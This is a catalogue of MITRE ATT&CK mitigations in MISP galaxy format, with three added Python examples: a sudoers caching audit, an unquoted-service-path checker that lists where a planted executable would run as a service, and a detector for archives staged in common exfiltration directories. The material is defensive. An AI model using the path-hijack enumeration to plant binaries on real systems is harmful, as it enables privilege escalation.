Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events. Application whitelisting may be able to prevent the running of executables masquerading as other files.

If a link is being visited by a user, block by default unknown or unused file types that should not be downloaded (such as .scr, .exe, .lnk, .pif, .cpl, etc.) and, by policy, downloads from suspicious sites, as a best practice to prevent some vectors. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and RAR, that may be used to conceal malicious files in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct files in a way to avoid these systems.

The tag is: misp-galaxy:mitre-course-of-action="User Execution Mitigation - T1204"

User Execution Mitigation - T1204 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 6599. Table References

Links

https://attack.mitre.org/mitigations/T1204

Restrict Registry Permissions - M1024

Restrict the ability to modify certain hives or keys in the Windows Registry.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Registry Permissions - M1024"

Table 6600. Table References

Links

https://attack.mitre.org/mitigations/M1024

User Account Control - M1052

Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.

The tag is: misp-galaxy:mitre-course-of-action="User Account Control - M1052"

Table 6601. Table References

Links

https://attack.mitre.org/mitigations/M1052

Privileged Process Integrity - M1025

Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Process Integrity - M1025"

Table 6602. Table References

Links

https://attack.mitre.org/mitigations/M1025

Port Knocking Mitigation - T1205

Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.

The tag is: misp-galaxy:mitre-course-of-action="Port Knocking Mitigation - T1205"

Port Knocking Mitigation - T1205 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 6603. Table References

Links

https://attack.mitre.org/mitigations/T1205

Privileged Account Management - M1026

Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Account Management - M1026"

Table 6604. Table References

Links

https://attack.mitre.org/mitigations/M1026

Multiband Communication Mitigation - T1026

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multiband Communication Mitigation - T1026"

Multiband Communication Mitigation - T1026 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"

Table 6605. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1026

Sudo Caching Mitigation - T1206

Setting the <code>timestamp_timeout</code> to 0 will require the user to input their password every time <code>sudo</code> is executed. Similarly, ensuring that the <code>tty_tickets</code> setting is enabled will prevent this leakage across tty sessions.
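
An audit of those two settings, added here as an example rather than anything from the MITRE text: it parses the <code>Defaults</code> lines of a sudoers file, applies them in order as sudo does (a later line overrides an earlier one), and reports every scope in which a password stays cached after first use. The sudoers fragments are constructed; the built-in defaults assumed (a 5 minute <code>timestamp_timeout</code>, <code>tty_tickets</code> on) are those documented in sudoers(5), so an absent option is treated as those values.

```python
"""Audit sudoers Defaults for credential caching (added example).

Parses the Defaults lines of a sudoers file, applies them in order the way
sudo does (later lines override earlier ones), and reports every scope in
which a password remains cached after first use: timestamp_timeout other
than 0, or tty_tickets switched off. Sample sudoers text is constructed.
"""
from __future__ import annotations

import re

DEFAULT_TIMEOUT = 5.0       # sudoers(5): timestamp_timeout defaults to 5 minutes
DEFAULT_TTY_TICKETS = True  # sudoers(5): tty_tickets is on by default

_DEFAULTS_LINE = re.compile(r"^Defaults(?P<scope>[:@>!]\S+)?\s+(?P<opts>.+)$")
_OPTION = re.compile(r"^(?P<neg>!)?(?P<name>[A-Za-z_]\w*)\s*(?P<op>\+=|-=|=)?\s*(?P<val>.*)$")
_SPLIT_COMMAS = re.compile(r',\s*(?=(?:[^"]*"[^"]*")*[^"]*$)')   # commas outside quotes


def _logical_lines(text: str):
    """Join backslash continuations, drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if buf:
            line = buf + " " + line
            buf = ""
        if line.endswith("\\"):
            buf = line[:-1].rstrip()
            continue
        if line and not line.startswith("#"):
            yield line
    if buf:
        yield buf


def _value(match: re.Match) -> object:
    """!flag -> False, bare flag -> True, name=value -> number or string."""
    if match["neg"]:
        return False
    if match["op"] is None:
        return True
    val = match["val"].strip().strip('"')
    try:
        return float(val)
    except ValueError:
        return val


def parse_defaults(text: str) -> dict[str, dict[str, object]]:
    """scope -> {option: value}. Scope "" is global; ":user", "@host",
    ">runas" and "!command" are sudo's per-scope Defaults forms."""
    scopes: dict[str, dict[str, object]] = {"": {}}
    for line in _logical_lines(text):
        m = _DEFAULTS_LINE.match(line)
        if not m:
            continue                      # user specs, aliases, includes
        bucket = scopes.setdefault(m["scope"] or "", {})
        for opt in _SPLIT_COMMAS.split(m["opts"]):
            om = _OPTION.match(opt.strip())
            if om:
                bucket[om["name"]] = _value(om)
    return scopes


def sudo_cache_findings(text: str) -> list[tuple[str, str, object]]:
    """(scope, option, effective value) for every setting that leaves a
    cached sudo credential reusable. Per-scope entries are reported only
    when they set the option explicitly; the global scope uses sudo's
    built-in defaults when the option is absent."""
    findings: list[tuple[str, str, object]] = []
    for scope, opts in parse_defaults(text).items():
        timeout = opts.get("timestamp_timeout", DEFAULT_TIMEOUT if scope == "" else None)
        if timeout is not None and timeout != 0:      # negative = never expires
            findings.append((scope, "timestamp_timeout", timeout))
        tty = opts.get("tty_tickets", DEFAULT_TTY_TICKETS if scope == "" else None)
        if tty is False:
            findings.append((scope, "tty_tickets", False))
    return findings


# Constructed sudoers fragments, not taken from any real host.
WEAK_SUDOERS = """\
Defaults    env_reset
Defaults    timestamp_timeout=30, \\
            !tty_tickets
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
"""
HARDENED_SUDOERS = """\
Defaults    env_reset
Defaults    timestamp_timeout=0, tty_tickets
Defaults:deploy timestamp_timeout=5
%admin  ALL=(ALL) ALL
"""

if __name__ == "__main__":
    for label, text in [("weak", WEAK_SUDOERS), ("hardened", HARDENED_SUDOERS)]:
        print(label, sudo_cache_findings(text))
```

Run it over <code>/etc/sudoers</code> and every file in <code>/etc/sudoers.d</code>, since an include can re-enable caching after the main file turned it off; note that a per-user line such as <code>Defaults:deploy timestamp_timeout=5</code> quietly reopens the window for that account, which is why the check reports scopes individually. Validate any change with <code>visudo -c</code> before relying on it.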

The tag is: misp-galaxy:mitre-course-of-action="Sudo Caching Mitigation - T1206"

Sudo Caching Mitigation - T1206 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206" with estimative-language:likelihood-probability="almost-certain"

Table 6606. Table References

Links

https://attack.mitre.org/mitigations/T1206

Operating System Configuration - M1028

Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

The tag is: misp-galaxy:mitre-course-of-action="Operating System Configuration - M1028"

Table 6607. Table References

Links

https://attack.mitre.org/mitigations/M1028

Remote Data Storage - M1029

Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

The tag is: misp-galaxy:mitre-course-of-action="Remote Data Storage - M1029"

Table 6608. Table References

Links

https://attack.mitre.org/mitigations/M1029

Time Providers Mitigation - T1209

Identify and block potentially malicious software that may be executed as a time provider by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

Consider using Group Policy to configure and block subsequent modifications to W32Time parameters. (Citation: Microsoft W32Time May 2017)

The tag is: misp-galaxy:mitre-course-of-action="Time Providers Mitigation - T1209"

Time Providers Mitigation - T1209 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"

Table 6609. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1209

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

Scheduled Transfer Mitigation - T1029

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Transfer Mitigation - T1029"

Scheduled Transfer Mitigation - T1029 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

Table 6610. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1029

Limit Software Installation - M1033

Block users or groups from installing unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Limit Software Installation - M1033"

Table 6611. Table References

Links

https://attack.mitre.org/mitigations/M1033

Credential Access Protection - M1043

Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

The tag is: misp-galaxy:mitre-course-of-action="Credential Access Protection - M1043"

Table 6612. Table References

Links

https://attack.mitre.org/mitigations/M1043

Limit Hardware Installation - M1034

Block users or groups from installing or using unapproved hardware on systems, including USB devices.

The tag is: misp-galaxy:mitre-course-of-action="Limit Hardware Installation - M1034"

Table 6613. Table References

Links

https://attack.mitre.org/mitigations/M1034

Path Interception Mitigation - T1034

Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and shortcuts by quoting paths that contain spaces wherever the calling function allows it (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.

Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel).

Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory <code>C:</code> and system directories, such as <code>C:\Windows\</code>, to reduce places where malicious files could be placed for execution.

Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.
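
The unquoted-service-path case from the first paragraph, worked through as an added example (not code from MITRE, MISP or the cited tools): it reproduces the lookup CreateProcess performs when an ImagePath is unquoted and contains spaces, lists the file names Windows would try before reaching the real binary, reports those that sit in a directory a standard user can write to, and shows the quoted form that closes the hole. The service path, binary and directory permissions are constructed; on a live host the candidates would be checked against the real ACLs.

```python
"""Unquoted service path check (added example).

Reproduces the lookup CreateProcess performs when a service's ImagePath
is unquoted and contains spaces (MSDN CreateProcess remarks), lists the
file names Windows would try before reaching the real binary, and reports
those an unprivileged user could plant. All paths and ACL facts below are
constructed for the example.
"""
from __future__ import annotations

import ntpath
import re


def _with_exe(path: str) -> str:
    """CreateProcess appends .exe when the candidate name has no extension."""
    return path if "." in ntpath.basename(path) else path + ".exe"


def candidate_executables(image_path: str) -> list[str]:
    """File names tried, in order, for the given ImagePath.

    A quoted path has exactly one candidate. An unquoted one is split at
    every run of whitespace and each prefix is tried in turn."""
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end]] if end > 0 else []
    cands: list[str] = []
    for m in re.finditer(r"\s+", image_path):
        cands.append(_with_exe(image_path[:m.start()]))
    cands.append(_with_exe(image_path))
    seen: set[str] = set()
    unique: list[str] = []
    for cand in cands:
        if cand.lower() not in seen:
            seen.add(cand.lower())
            unique.append(cand)
    return unique


def _norm_dir(path: str) -> str:
    return ntpath.dirname(path).rstrip("\\").lower()


def hijack_candidates(image_path: str, real_exe: str,
                      user_writable_dirs: set[str]) -> list[str]:
    """Candidates tried *before* the real binary whose directory a
    standard user can write to. Any hit is a path interception weakness:
    a file created there runs as the service account at next start."""
    writable = {d.rstrip("\\").lower() for d in user_writable_dirs}
    hits: list[str] = []
    for cand in candidate_executables(image_path):
        if cand.lower() == real_exe.lower():
            break
        if _norm_dir(cand) in writable:
            hits.append(cand)
    return hits


def quote_image_path(image_path: str, real_exe: str) -> str:
    """The fix: quote the executable and leave the arguments alone."""
    if image_path.startswith('"'):
        return image_path
    if not image_path.lower().startswith(real_exe.lower()):
        raise ValueError("real_exe is not a prefix of image_path")
    return f'"{image_path[:len(real_exe)]}"{image_path[len(real_exe):]}'


# Constructed sample: a service installed outside Program Files, in a
# directory the installer created at the root of C:\ and that therefore
# inherited write access for Authenticated Users (hypothetical ACL).
SAMPLE_IMAGE_PATH = r"C:\Acme Tools\Agent Service\agentsvc.exe -service"
REAL_EXE = r"C:\Acme Tools\Agent Service\agentsvc.exe"
USER_WRITABLE_DIRS = {r"C:\Acme Tools"}

if __name__ == "__main__":
    for cand in candidate_executables(SAMPLE_IMAGE_PATH):
        print("tries:", cand)
    print("hijackable:", hijack_candidates(SAMPLE_IMAGE_PATH, REAL_EXE, USER_WRITABLE_DIRS))
    fixed = quote_image_path(SAMPLE_IMAGE_PATH, REAL_EXE)
    print("fixed ImagePath:", fixed)
    print("hijackable after fix:", hijack_candidates(fixed, REAL_EXE, USER_WRITABLE_DIRS))
```

Quoting removes the ambiguity entirely, which is why it is the first fix; tightening the ACL on the intermediate directories is the defence in depth from the third paragraph above, and both are needed when the install directory is shared with other software.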

The tag is: misp-galaxy:mitre-course-of-action="Path Interception Mitigation - T1034"

Path Interception Mitigation - T1034 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

Table 6614. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1034

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://msdn.microsoft.com/en-us/library/ff919712.aspx

https://skanthak.homepage.t-online.de/sentinel.html

Service Execution Mitigation - T1035

Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.

Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Service Execution Mitigation - T1035"

Service Execution Mitigation - T1035 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 6615. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1035

https://technet.microsoft.com/en-us/library/ee791851.aspx

Scheduled Task Mitigation - T1053

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)

Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl</code>. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)

Configure the Increase Scheduling Priority option to only allow the Administrators group the right to schedule a priority process. This can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)

Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Task Mitigation - T1053"

Scheduled Task Mitigation - T1053 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 6616. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1053

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://technet.microsoft.com/library/dn221960.aspx

https://technet.microsoft.com/library/jj852168.aspx

Account Use Policies - M1036

Configure features related to account use like login attempt lockouts, specific login times, etc.

The tag is: misp-galaxy:mitre-course-of-action="Account Use Policies - M1036"

Table 6617. Table References

Links

https://attack.mitre.org/mitigations/M1036

Filter Network Traffic - M1037

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The tag is: misp-galaxy:mitre-course-of-action="Filter Network Traffic - M1037"

Table 6618. Table References

Links

https://attack.mitre.org/mitigations/M1037

Logon Scripts Mitigation - T1037

Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Logon Scripts Mitigation - T1037"

Logon Scripts Mitigation - T1037 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"

Table 6619. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1037

Environment Variable Permissions - M1039

Prevent modification of environment variables by unauthorized users and groups.

The tag is: misp-galaxy:mitre-course-of-action="Environment Variable Permissions - M1039"

Table 6620. Table References

Links

https://attack.mitre.org/mitigations/M1039

Process Hollowing Mitigation - T1093

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Hollowing Mitigation - T1093"

Process Hollowing Mitigation - T1093 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-language:likelihood-probability="almost-certain"

Table 6621. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1093

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict Library Loading - M1044

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Library Loading - M1044"

Table 6622. Table References

Links

https://attack.mitre.org/mitigations/M1044

Indicator Blocking Mitigation - T1054

Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Blocking Mitigation - T1054"

Table 6623. Table References

Links

https://attack.mitre.org/mitigations/T1054

https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal

Software Packing Mitigation - T1045

Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.

Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Software Packing Mitigation - T1045"

Software Packing Mitigation - T1045 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 6624. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1045

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Staged Mitigation - T1074

Identify system utilities, remote access or third-party tools, users or potentially malicious software that may be used to store compressed or encrypted data in a publicly writeable directory, central location, or commonly used staging directories (e.g. recycle bin) that is indicative of non-standard behavior, and audit and/or block them by using file integrity monitoring tools where appropriate. Consider applying data size limits or blocking file writes of common compression and encryption utilities such as 7zip, RAR, ZIP, or zlib on frequently used staging directories or central locations and monitor attempted violations of those restrictions.
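
The monitoring side of the paragraph above, as an added example that is not part of the MITRE or MISP text: a detection that runs over file-write events of the kind an EDR or file integrity monitor emits, flags archives written into common staging locations by their leading bytes rather than their extension (a renamed .dat or .tmp is still a ZIP), and reports users whose staged volume exceeds a size limit. The event records, the staging-directory list and the quota are constructed.

```python
"""Staging-directory archive detection (added example).

Runs over file-write events (as an EDR or file integrity monitor would
emit them) and flags archives written to common staging locations by
content rather than by extension, plus users whose staged volume exceeds
a size limit. Event records, directories and thresholds are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# Leading bytes of the archive formats named above (ZIP, RAR, 7z, gzip).
ARCHIVE_MAGIC = {
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"\x1f\x8b": "gzip",
}

# Locations commonly used to stage data before exfiltration (constructed list;
# tune per environment, ProgramData in particular sees many benign writes).
STAGING_DIRS = (r"c:\$recycle.bin", r"c:\users\public", r"c:\windows\temp", r"c:\programdata")


@dataclass(frozen=True)
class FileWrite:
    host: str
    user: str
    path: str
    size: int      # bytes
    head: bytes    # first bytes of the file as written


def archive_type(head: bytes) -> str | None:
    for magic, name in ARCHIVE_MAGIC.items():
        if head.startswith(magic):
            return name
    return None


def in_staging_dir(path: str) -> bool:
    p = path.lower()
    return any(p.startswith(d + "\\") for d in STAGING_DIRS)


def find_staged_archives(events) -> list[tuple[str, str, str]]:
    """(host, path, format) for every archive written to a staging
    directory, whatever extension it was given."""
    hits: list[tuple[str, str, str]] = []
    for e in events:
        kind = archive_type(e.head)
        if kind and in_staging_dir(e.path):
            hits.append((e.host, e.path, kind))
    return hits


def users_over_quota(events, quota_bytes: int) -> dict[str, int]:
    """Users whose total bytes written into staging directories exceed the limit."""
    totals: dict[str, int] = defaultdict(int)
    for e in events:
        if in_staging_dir(e.path):
            totals[e.user] += e.size
    return {user: total for user, total in totals.items() if total > quota_bytes}


# Constructed events: alice stages two renamed archives; bob's writes are
# an installer log and a small gzip cache file.
SAMPLE_EVENTS = [
    FileWrite("ws01", "alice", r"C:\$Recycle.Bin\S-1-5-21-1-2-3-1001\$R7KX2QD.dat",
              52_000_000, b"PK\x03\x04\x14\x00"),
    FileWrite("ws01", "alice", r"C:\Users\Public\Libraries\report.tmp",
              30_000_000, b"Rar!\x1a\x07\x01\x00"),
    FileWrite("ws01", "alice", r"C:\Users\alice\Documents\notes.docx",
              120_000, b"PK\x03\x04\x14\x00"),
    FileWrite("ws02", "bob", r"C:\Windows\Temp\installer.log", 4_000, b"2024-"),
    FileWrite("ws02", "bob", r"C:\ProgramData\cache\blob.bin", 500_000, b"\x1f\x8b\x08\x00"),
]
QUOTA = 50_000_000

if __name__ == "__main__":
    for hit in find_staged_archives(SAMPLE_EVENTS):
        print("archive in staging dir:", hit)
    print("over quota:", users_over_quota(SAMPLE_EVENTS, QUOTA))
```

The .docx in the user's own Documents folder is a ZIP container too and is correctly ignored, which is why location and content are combined rather than either alone; bob's small gzip file shows the kind of benign hit a per-environment allow-list for the ProgramData path would remove.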

The tag is: misp-galaxy:mitre-course-of-action="Data Staged Mitigation - T1074"

Data Staged Mitigation - T1074 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 6625. Table References

Links

https://attack.mitre.org/mitigations/T1074

Environmental Keying Mitigation - T1480

This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.

The tag is: misp-galaxy:mitre-course-of-action="Environmental Keying Mitigation - T1480"

Table 6626. Table References

Links

https://attack.mitre.org/mitigations/T1480

Do Not Mitigate - M1055

This category groups techniques for which a mitigation might itself increase the risk of compromise; mitigation is therefore not recommended.

The tag is: misp-galaxy:mitre-course-of-action="Do Not Mitigate - M1055"

Table 6627. Table References

Links

https://attack.mitre.org/mitigations/M1055

Data Loss Prevention - M1057

Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)

The tag is: misp-galaxy:mitre-course-of-action="Data Loss Prevention - M1057"

Table 6628. Table References

Links

https://attack.mitre.org/mitigations/M1057

https://purplesec.us/data-loss-prevention/

Process Discovery Mitigation - T1057

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Discovery Mitigation - T1057"

Process Discovery Mitigation - T1057 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 6629. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1057

https://technet.microsoft.com/en-us/library/ee791851.aspx

Account Discovery Mitigation - T1087

Prevent administrator accounts from being enumerated when an application elevates through UAC, since this discloses account names. The Registry value is <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators</code>. It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: Enumerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

